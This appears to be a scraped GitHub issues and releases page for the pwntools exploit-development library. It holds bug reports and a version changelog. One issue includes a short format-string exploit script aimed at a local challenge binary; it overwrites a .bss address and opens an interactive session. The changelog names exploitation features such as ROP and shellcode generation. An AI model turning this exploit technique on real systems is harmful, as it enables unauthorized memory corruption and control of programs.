    usr/lib/python3.10/site-packages/pwntools-doc/README.md	      |	usr/pwntools-doc/README.md
    usr/lib/python3.10/site-packages/pwntools-doc/TESTING.md      |	usr/pwntools-doc/TESTING.md
    usr/lib/python3.10/site-packages/pwntools-doc/requirements.tx |	usr/pwntools-doc/requirements.txt
    

    I ultimately don't care that much about the documentation location, but /usr/pwntools-doc is not a standard location according to the Filesystem Hierarchy Standard. Is there a way I can change this to /usr/share/doc/pwntools when building the package?

    I'm using this command to prepare the package contents (${pkgdir} is the directory that gets put into the package):

    python setup.py install -O1 --root="${pkgdir}" --skip-build --only-use-pwn-command
    

    Thanks!

    feature 
    opened by kpcyrd 1
  • FmtStr IndexError: list index out of range

    FmtStr IndexError: list index out of range

    Newest version. The process is random, sometimes more and sometimes less, but there is bound to be an error.

    Traceback (most recent call last):
      File "/root/Desktop/PwnExploits/test.py", line 11, in <module>
        autofmt = FmtStr(exec_fmt)
      File "/usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 844, in __init__
        self.offset, self.padlen = self.find_offset()
      File "/usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 863, in find_offset
        leak = self.leak_stack(off, marker)
      File "/usr/local/lib/python3.10/dist-packages/pwnlib/fmtstr.py", line 854, in leak_stack
        leak = re.findall(br"START(.*?)END", leak, re.MULTILINE | re.DOTALL)[0]
    IndexError: list index out of range

    I tried #2077 but it does not work; I still have this error and don't know why. I have tried a lot of people's code, including the pwntools wiki.

    from pwn import *
    
    def exec_fmt(pad):
        p = process("/root/Desktop/PwnSubjects/pwn5")
        p.send(pad)
        info = p.recv()
        return info
    
    autofmt = FmtStr(exec_fmt)
    offset = autofmt.offset
    print("offset ===> ", offset)
    
    p = process("/root/Desktop/PwnSubjects/pwn5")
    bss_ad = 0x0804C044
    pad = fmtstr_payload(offset, {bss_ad: 1})
    p.send(pad)
    p.recvuntil("your passwd:")
    p.send("1")
    
    p.interactive()

    elf: pwn5.zip

    bug backport-required 
    opened by XKaguya 2
  • Handle `context.newline` correctly in `tube.interactive()`

    Handle `context.newline` correctly in `tube.interactive()`

    The context.newline or self.newline variable isn't obeyed when typing in interactive mode. It is used when sending and receiving lines through tube.sendline though, causing a mismatch.

    The receiving end of the tube.interactive() already has handling of newlines, but the sending side does not.

    Example:

    from pwn import *
    io = process('cat')
    io.newline = b'\r\n'
    io.sendline(b'auto')
    io.interactive()
    
    $ python testinteractive.py DEBUG
    [x] Starting local process '/usr/bin/cat' argv=[b'cat']
    [+] Starting local process '/usr/bin/cat' argv=[b'cat'] : pid 19060
    [DEBUG] Sent 0x6 bytes:
        b'auto\r\n'
    [*] Switching to interactive mode
    [DEBUG] Received 0x6 bytes:
        b'auto\r\n'
    auto
    $ test
    [DEBUG] Sent 0x5 bytes:
        b'test\n'
    [DEBUG] Received 0x5 bytes:
        b'test\n'
    test
    

    The expected outcome would be to send b'test\r\n'.

    The same problem arises in non-term mode (PWNLIB_NOTERM=1), where stdin is read in binary mode, causing the OS line separators to come through. Correctly replacing them with the context.newline setting allows using the interactive input on Windows hosts as well, without constantly sending \r\n.

    opened by peace-maker 7
Releases(4.10.0beta0)
  • 4.10.0beta0(Dec 29, 2022)

    • #2062 make pwn cyclic -l work with entry larger than 4 bytes
    • #2092 shellcraft: dup() is now called dupio() consistently across all supported arches
    • #2093 setresuid() in shellcraft uses current euid by default
    • #2125 Allow tube.recvregex to return capture groups
    • #2144 Removes p2align 2 asm() headers from x86-32, x86-64 and mips architectures to avoid inconsistent instruction length when patching binaries
  • 4.9.0(Dec 29, 2022)

    • #1975 Add libcdb commandline tool
    • #1979 Add js_escape() and js_unescape() to util.fiddling
    • #2011 Fix tube's debug output of same byte compression
    • #2023 Support KDE Konsole in run_in_new_terminal function
    • #2027 Fix ELF.libc_start_main_return with glibc 2.34
    • #2033 Quote file and core path in generated GDB script
    • #2035 Change Buffer's parent class to object
    • #2037 Allow SSH tunnel to be treated like a TCP socket (with 'raw=True')
    • #2123 Fix ROP without a writeable cache directory
    • #2124 Fix tube.recvpred() timeout argument
  • 4.9.0beta0(Apr 20, 2022)

    • #1975 Add libcdb commandline tool
    • #1979 Add js_escape() and js_unescape() to util.fiddling
    • #2011 Fix tube's debug output of same byte compression
    • #2023 Support KDE Konsole in run_in_new_terminal function
    • #2027 Fix ELF.libc_start_main_return with glibc 2.34
    • #2033 Quote file and core path in generated GDB script
    • #2035 Change Buffer's parent class to object
    • #2037 Allow SSH tunnel to be treated like a TCP socket (with 'raw=True')
  • 4.8.0(Apr 20, 2022)

    • #1922 Fix logic in wait_for_debugger
    • #1828 libcdb: Load debug info and unstrip libc binary
    • #1939 Fix error in validating log levels
    • #1981 Fix cyclic_find() to make it work with large int values
  • 4.7.1(Apr 20, 2022)

    • #1784 Use temporary cache directory when persistent cache cannot be used
    • #1973 ELF symbols can be looked up by bytes values
    • several bugfixes (#2012, #2031, #1912, #1961, #2007, #2040, #2051)
  • 4.8.0beta0(Nov 15, 2021)

  • 4.7.0(Nov 15, 2021)

    • #1733 Update libc headers -> more syscalls available!
    • #1876 add self.message and change sys.exc_type to sys.exc_info() in PwnlibException
    • #1877 encoders error message handles when avoid is bytes in python3
    • #1891 Keep ROP gadgets when setting registers via setattr/call
    • #1892 Silence SIGPIPE error for "pwn phd"
    • #1893 Fix bytes warning in "pwn cyclic"
    • #1897 Add basic support for RISC-V
    • #1903 Add zsh completion script
    • #1904 Add bash completion script
    • #1906 Defer import of several modules to save on startup time
    • #1921 Add basic support for the bare-metal ARM specific toolchain
    • #1995 Add shellcraft.*.linux.cat2, which uses alloc+read+write instead of sendfile
  • 4.7.0beta0 (Jul 12, 2021)

    • #1733 Update libc headers -> more syscalls available!
    • #1876 add self.message and change sys.exc_type to sys.exec_info() in PwnlibException
    • #1877 encoders: error message handles the case where avoid is bytes in python3
    • #1891 Keep ROP gadgets when setting registers via setattr/call
    • #1892 Silence SIGPIPE error for "pwn phd"
    • #1893 Fix bytes warning in "pwn cyclic"
    • #1897 Add basic support for RISC-V
    • #1903 Add zsh completion script
    • #1904 Add bash completion script
    • #1906 Defer import of several modules to save on startup time
    • #1921 Add basic support for the bare-metal ARM specific toolchain
  • 4.6.0 (Jul 12, 2021)

    • #1429 Add a mechanism for ret2csu (originally #1138)
    • #1566 Add ignore_config argument to pwnlib.tubes.ssh and improve allow_agent implementation
    • #1652 Add process.readmem and process.writemem
    • #1739 Add/fix shellcraft.linux.kill() / shellcraft.linux.killparent()
    • #1746 Prefer Python3 over Python2 for spawning remote processes over SSH
    • #1751 Fix process() with executable relative to cwd
    • #1753 major change: less unconditional imports in pwnlib
    • #1776 mips: do not use $t0 temporary variable in dupio
    • #1846 support launching GDB in more different terminals
  • 4.6.0beta1 (May 31, 2021)

  • 4.5.1 (May 31, 2021)

  • 4.6.0beta0 (Apr 30, 2021)

    • #1429 Add a mechanism for ret2csu (originally #1138)
    • #1566 Add ignore_config argument to pwnlib.tubes.ssh and improve allow_agent implementation
    • #1652 Add process.readmem and process.writemem
    • #1739 Add/fix shellcraft.linux.kill() / shellcraft.linux.killparent()
    • #1746 Prefer Python3 over Python2 for spawning remote processes over SSH
    • #1751 Fix process() with executable relative to cwd
    • #1753 major change: less unconditional imports in pwnlib
    • #1776 mips: do not use $t0 temporary variable in dupio
    • #1846 support launching GDB in more different terminals
  • 4.5.0 (Apr 30, 2021)

    • #1261 Misc run_in_new_terminal improvements (notably gdb terminated by default)
    • #1695 Allow using GDB Python API
    • #1735 Python 3.9 support in safeeval
    • #1738 which() function supports a custom search path
      • process() now also looks at env['PATH'] to find the executable
    • #1742 New baremetal os to debug binaries executed with qemu-system-$(arch)
    • #1757 update cache directories
    • #1758 Remove eval from cli
    • #1780 Re-add Python2 to the official Dockerfile
    • #1941 Disable all Android tests, pwnlib.adb is no longer supported in CI
    • #1811 Remove unnecessary pwn.toplevel.__all__
    • #1827 Support $XDG_CONFIG_HOME dir for pwn.conf
    • #1841 Add colored_traceback
    • #1839 run_in_new_terminal now creates a runner script if given a list or tuple
    • #1833 Add pwnlib.filesystem module
    • #1852 Fix atexit on Python 3
  • 4.5.0beta1 (Apr 19, 2021)

  • 4.5.0beta0 (Mar 29, 2021)

    • #1261 Misc run_in_new_terminal improvements (notably gdb terminated by default)
    • #1695 Allow using GDB Python API
    • #1735 Python 3.9 support in safeeval
    • #1738 which() function supports a custom search path
      • process() now also looks at env['PATH'] to find the executable
    • #1742 New baremetal os to debug binaries executed with qemu-system-$(arch)
    • #1757 update cache directories
    • #1758 Remove eval from cli
    • #1780 Re-add Python2 to the official Dockerfile
    • #1941 Disable all Android tests, pwnlib.adb is no longer supported in CI
    • #1811 Remove unnecessary pwn.toplevel.__all__
    • #1827 Support $XDG_CONFIG_HOME dir for pwn.conf
    • #1841 Add colored_traceback
    • #1839 run_in_new_terminal now creates a runner script if given a list or tuple
    • #1833 Add pwnlib.filesystem module
  • 4.4.0 (Mar 29, 2021)

    • #1541 Use context.newline for tubes by default
    • #1602 Fix bytes handling in ssh tubes
    • #1606 Fix asm() and disasm() for MSP430, S390
    • #1616 Fix cyclic cli for 64 bit integers
    • #1632 Enable usage of Pwntools in jupyter
    • #1633 Open a shell if pwn template cannot download the remote file
    • #1644 Enable and support SNI for SSL-wrapped tubes
    • #1651 Make pwn shellcraft faster
    • #1654 Docker images (pwntools/pwntools:stable etc) now use Python3 by default, and include assemblers for a few common architectures
    • #1667 Add i386 encoder ascii_shellcode (Fixed docs in #1693)
    • Fix syscall instruction lists for SROP on i386 and amd64
    • Fix migration to another ROP
    • #1673 Add base= argument to ROP.chain() and ROP.dump()
    • #1675 Gdbserver now correctly accepts multiple libraries in LD_PRELOAD and LD_LIBRARY_PATH
    • #1678 ROPGadget multibr
    • #1682 ROPGadget multibr fix
    • #1687 Actually import requests when doing from pwn import *
    • #1688 Add __setattr__ and __call__ interfaces to ROP for setting registers
    • #1692 Remove python2 shebangs where appropriate
    • #1703 Update libcdb buildid offsets for amd64 and i386
    • #1704 Try https://libc.rip/ for libcdb lookup
  • 4.4.0beta1 (Nov 29, 2020)

  • 4.3.1 (Nov 29, 2020)

  • 4.4.0beta0 (Oct 20, 2020)

    • #1541 Use context.newline for tubes by default
    • #1602 Fix bytes handling in ssh tubes
    • #1606 Fix asm() and disasm() for MSP430, S390
    • #1616 Fix cyclic cli for 64 bit integers
    • #1632 Enable usage of Pwntools in jupyter
    • #1633 Open a shell if pwn template cannot download the remote file
    • #1644 Enable and support SNI for SSL-wrapped tubes
    • #1651 Make pwn shellcraft faster
    • #1654 Docker images (pwntools/pwntools:stable etc) now use Python3 by default, and include assemblers for a few common architectures
    • #1667 Add i386 encoder ascii_shellcode (Fixed docs in #1693)
    • Fix syscall instruction lists for SROP on i386 and amd64
    • Fix migration to another ROP
    • #1673 Add base= argument to ROP.chain() and ROP.dump()
    • #1675 Gdbserver now correctly accepts multiple libraries in LD_PRELOAD and LD_LIBRARY_PATH
    • #1678 ROPGadget multibr
    • #1682 ROPGadget multibr fix
    • #1687 Actually import requests when doing from pwn import *
    • #1688 Add __setattr__ and __call__ interfaces to ROP for setting registers
    • #1692 Remove python2 shebangs where appropriate
    • #1703 Update libcdb buildid offsets for amd64 and i386
  • 4.3.0 (Nov 24, 2020)

    • Speed up ELF PLT loading (#1515)
    • Take numbwritten bytes into account in FmtString (#1471)
    • Support opening of new windows in WSL (#1503)
    • #1576 Add executable= argument to ELF.search
    • #1584 Add jmp_esp/jmp_rsp attribute to ROP
    • #1592 Fix over-verbose logging of process() environment
    • #1593 Colorize output of pwn template
    • #1601 Add pwn version command line tool
    • #1605 Add to fiddling.hexdump a way to suppress the total at the end
    • #1613 Permit --password for pwn template
    • #1564 Fix asm() and disasm() for PowerPC64, MIPS64, Sparc64
    • #1621 Permit negative values in flat() and fit()
    • many more
  • 4.2.2 (Oct 20, 2020)

  • 4.2.1 (Jul 11, 2020)

  • 4.3.0beta0 (Jul 9, 2020)

    • Speed up ELF PLT loading (#1515)
    • Take numbwritten bytes into account in FmtString (#1471)
    • Support opening of new windows in WSL (#1503)
    • #1576 Add executable= argument to ELF.search
    • #1584 Add jmp_esp/jmp_rsp attribute to ROP
    • #1592 Fix over-verbose logging of process() environment
    • #1593 Colorize output of pwn template
    • #1601 Add pwn version command line tool
    • #1605 Add to fiddling.hexdump a way to suppress the total at the end
    • #1613 Permit --password for pwn template
    • #1564 Fix asm() and disasm() for PowerPC64, MIPS64, Sparc64
    • #1621 Permit negative values in flat() and fit()
  • 4.1.1 (Jun 3, 2020)

    • Fix PLT resolution by locking unicorn <1.0.2rc4 (#1538)
    • Fix wrong ELF/context unpack handling (c4c11a37)
    • Fix updating of ELF.functions addresses after changing ELF.address #1512 (#1513)
    • Update Corefile warnings and replace asserts with normal checks (#1526)
    • several py2-py3 issues (#1451)
    • Fix cyclic command
  • 4.2.0beta0 (May 8, 2020)

    • #1436 Add ret2dlresolve automation
    • fecf9f tubes.ssh.process() no longer requires python 2 installed on remote (still requires python, though)
    • Miscellaneous improvements to DynElf and fmtstr leaker (see examples/fmtstr/exploit2.py)
    • #1454 Support for windows console colors
  • 4.1.0 (May 8, 2020)

    • #1316 Fix connect shellcraft in python 3
    • #1323 Fix issues related with debugging
    • #1001 Enhance unlock_bootloader with better status messages
    • #1389 remove old dependencies
    • #1241 Launch QEMU with sysroot if specified
    • #1218 Support for FileStructure exploitation
    • Many bug fixes
  • 4.0.1 (Jan 22, 2020)

    • #1412 recvline_pred() and similar do not reorder data
    • Bypass unicorn-engine/unicorn#1100 and unicorn-engine/unicorn#1170 requiring unstable package
  • 4.1.0beta0 (Jan 9, 2020)

    • #1316 Fix connect shellcraft in python 3
    • #1323 Fix issues related with debugging
    • #1001 Enhance unlock_bootloader with better status messages
    • #1389 remove old dependencies
    • #1241 Launch QEMU with sysroot if specified
    • #1218 Support for FileStructure exploitation
  • 4.0.0 (Jan 9, 2020)

    • Python 3 support! <3
    • #1402 Fix serialtube in python 3
    • #1391 Fix process.libs
    • #1317 Tubes with context.encoding
    • #1216 Improve format string generator
    • #1285 Add freebsd generic syscall templates
    • 76413f Add pwnlib.adb.bootimg for 'ANDROID!' format boot.img images
    • #1202 Docker: Kill 14 layers in pwntools base images
    • #1182 shellcraft.dupio() for mips
  • 4.0.0beta0 (Nov 10, 2019)

    • Python 3 support! <3
    • #1317 Tubes with context.encoding
    • #1216 Improve format string generator
    • #1285 Add freebsd generic syscall templates
    • 76413f Add pwnlib.adb.bootimg for 'ANDROID!' format boot.img images
    • #1202 Docker: Kill 14 layers in pwntools base images
    • #1182 shellcraft.dupio() for mips